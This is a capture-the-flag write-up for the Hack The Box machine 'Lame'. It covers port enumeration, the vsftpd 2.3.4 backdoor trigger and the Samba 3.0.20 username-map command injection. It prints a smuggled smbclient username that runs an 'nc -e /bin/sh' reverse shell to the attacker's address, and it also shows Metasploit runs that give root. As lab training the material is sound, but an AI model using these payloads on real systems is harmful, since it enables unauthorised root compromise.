HTB Lame
10.10.10.3 - Lame
| Hack The Box | Created by | Points |
|---|---|---|
| Link | ch4p | 20 |
Open ports
luc@kali:~/HTB/Lame$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.3
| Port | Service | Version |
|---|---|---|
| 21/tcp | ftp | vsftpd 2.3.4 |
| 22/tcp | ssh | OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) |
| 139/tcp | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
| 445/tcp | netbios-ssn | Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) |
| 3632/tcp | distccd | distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) |
FTP - vsftpd 2.3.4
luc@kali:~/HTB/Lame$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:luc): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lsa
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
Anonymous login is allowed, but there is no content on the FTP server.
We do know that this server uses vsftpd 2.3.4 and there is a backdoor in this version.
luc@kali:~/HTB/Lame$ searchsploit vsFTPd
...
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
I prefer a non Metasploit exploit because of OSCP preparation where Metasploit usage is limited. We’ll get back to this exploit in Bonus/vsftpd 2.3.4 with Metasploit.
vsftpd 2.3.4 without Metasploit
This version of vsftpd has a backdoor which is triggered by having the username contain :). This will open port 6200 which is a shell the hacker can use to issue commands on the server.
First we need to trigger the exploit
luc@kali:~/HTB/Lame$ nc 10.10.10.3 21
220 (vsFTPd 2.3.4)
USER exploit:)
331 Please specify the password.
PASS xxx
530 Login incorrect.
We should now be able to connect to port 6200.
luc@kali:~/HTB/Lame$ nc 10.10.10.3 6200
Ncat: TIMEOUT.
luc@kali:~/HTB/Lame$ sudo nmap -p 6200 10.10.10.3
[sudo] password for luc:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 13:11 CEST
Nmap scan report for 10.10.10.3
Host is up (0.014s latency).
PORT STATE SERVICE
6200/tcp filtered lm-x
Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds
We get a timeout when accessing this port and nmap also shows that 6200 is still closed. It appears to be that this isn’t the version with the backdoor or something else is blocking traffic to port 6200.
SMB
The server is open to external SMB connections, we don’t have any user accounts yet so we try anonymous access.
luc@kali:~/HTB/Lame$ smbmap -H 10.10.10.3 -R
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
.\tmp\*
dr--r--r-- 0 Sat Jun 13 10:18:25 2020 .
dw--w--w-- 0 Sun May 20 20:36:11 2012 ..
dr--r--r-- 0 Sat Jun 13 08:05:10 2020 .ICE-unix
dr--r--r-- 0 Sat Jun 13 08:05:35 2020 .X11-unix
fw--w--w-- 11 Sat Jun 13 08:05:35 2020 .X0-lock
fw--w--w-- 0 Sat Jun 13 08:06:17 2020 5142.jsvc_up
.\tmp\.X11-unix\*
dr--r--r-- 0 Sat Jun 13 08:05:35 2020 .
dr--r--r-- 0 Sat Jun 13 10:18:25 2020 ..
fr--r--r-- 0 Sat Jun 13 08:05:35 2020 X0
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
We’ve read and write access to the tmp share, but no interesting files are here.
The version is Samba is Samba smbd 3.0.20-Debian, we can try finding an exploit for this version.
luc@kali:~/HTB/Lame$ searchsploit Samba 3.0
...
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
...
We search for Samba 3.0 so we also get exploits that don’t explicitly name the version the server uses, but that do work. 16320 is an exploit that should work on this machine, but it uses Metasploit and we’re trying to avoid that tool. Metasploit will be used in Bonus/Samba exploit with Metasploit
SMB exploit without metasploit
The Metasploit module is quite short because it’s an easy to exploit vulnerability. Samba 3.0.20 - 3.0.25rc3 are vulnerable when using the non-default “username map script” configuration option. By specifying a username that contains shell meta characters like ` code execution can be achieved.
This part of the Metasploit module will send the payload.
def exploit
connect
# lol?
username = "/=`nohup " + payload.encoded + "`"
begin
simple.client.negotiate(false)
simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
rescue ::Timeout::Error, XCEPT::LoginError
# nothing, it either worked or it didn't ;)
end
handler
end
We can see that the payload is in the username field. We can exploit this by specifying a username with our payload to smbclient when connecting to the server.
luc@kali:~/HTB/Lame$ smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/sh 10.10.14.16 443`'
Enter =`NOHUP NC -E \bin/sh 10.10.14.16 443`'s password:
session setup failed: NT_STATUS_LOGON_FAILURE
We don’t get a session back to our netcat listener and we can clearly see why. nohup nc -e /bin/sh is changed to NOHUP NC -E \bin/sh breaking our payload.
Smbclient does have another way of logging in, we first login anonymous to the tmp share where we have anonymous access. When connected we use the logon command that’s used to change to another user account. We supply this with our username that contains the payload and an empty password.
luc@kali:~/HTB/Lame$ smbclient //10.10.10.3/tmp
Enter WORKGROUP\luc's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.16 443`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
luc@kali:~/HTB/Lame$ sudo nc -lnvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:34076.
id
uid=0(root) gid=0(root)
SMB was running as root so our reverse shell is also running as root. We can now read the root and user flags.
which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
root@lame:/# ls /home -R
/home:
ftp makis service user
/home/ftp:
/home/makis:
user.txt
/home/service:
/home/user:
root@lame:/# cat /home/makis/user.txt
69454a93************************
root@lame:/# cat /root/root.txt
92caac3b************************
TL;DR
- Vulnerable version of SMB allows for RCE as root
Bonus
vsftpd 2.3.4 with Metasploit
luc@kali:~/HTB/Lame$ sudo msfdb init && msfconsole -q
[+] Starting database
[i] The database appears to be already configured, skipping initialization
-----------------------------------------------------------------------------------
The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
/usr/share/metasploit-framework/lib/pg/deprecated_constants.rb
-----------------------------------------------------------------------------------
msf5 > search vsftp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/interact manual No Unix Command, Interact with Established Connection
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
This matches our earlier findings where manually exploiting this backdoor didn’t work.
Why vsftpd 2.3.4 backdoor didn’t work
We’ve root access after exploiting the SMB vulnerability so with that access on the machine we can check what happens on the machine when the backdoor is triggered.
First we’ll switch from root to the Makis user account, we know Makis is an user because it has a folder in /home (we found the user.txt there).
id
uid=0(root) gid=0(root)
python -c "import pty;pty.spawn('/bin/bash')"
root@lame:/# su - makis -c bash
makis@lame:~$
We can try connecting on 127.0.0.1 to port 6200 as the Makis user
makis@lame:~$ nc 127.0.0.1 6200
(UNKNOWN) [127.0.0.1] 6200 (?) : Connection refused
This connection is refused because it has been some time since we triggered the backdoor so the port is closed again.
luc@kali:~/HTB/Lame$ nc 10.10.10.3 21
220 (vsFTPd 2.3.4)
USER exploit:)
331 Please specify the password.
PASS xxx
530 Login incorrect.
After triggering the backdoor we can retry connecting on 127.0.0.1:6200.
makis@lame:~$ nc 127.0.0.1 6200
id
uid=0(root) gid=0(root)
We now have successfully used the backdoor. This could’ve been a path to root if SMB didn’t give root already.
SMB exploit with Metasploit
luc@kali:~/HTB/Lame$ sudo msfdb init && msfconsole -q
[i] Database already started
[i] The database appears to be already configured, skipping initialization
-----------------------------------------------------------------------------------
The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
/usr/share/metasploit-framework/lib/pg/deprecated_constants.rb
-----------------------------------------------------------------------------------
msf5 > search usermap
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads
...
18 cmd/unix/reverse manual No Unix Command Shell, Double Reverse TCP (telnet)
...
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => 10.10.14.16
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.16:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oYJsXKQe85rE2iV4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oYJsXKQe85rE2iV4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.16:4444 -> 10.10.10.3:54926) at 2020-06-16 14:45:10 +0200
id
uid=0(root) gid=0(root)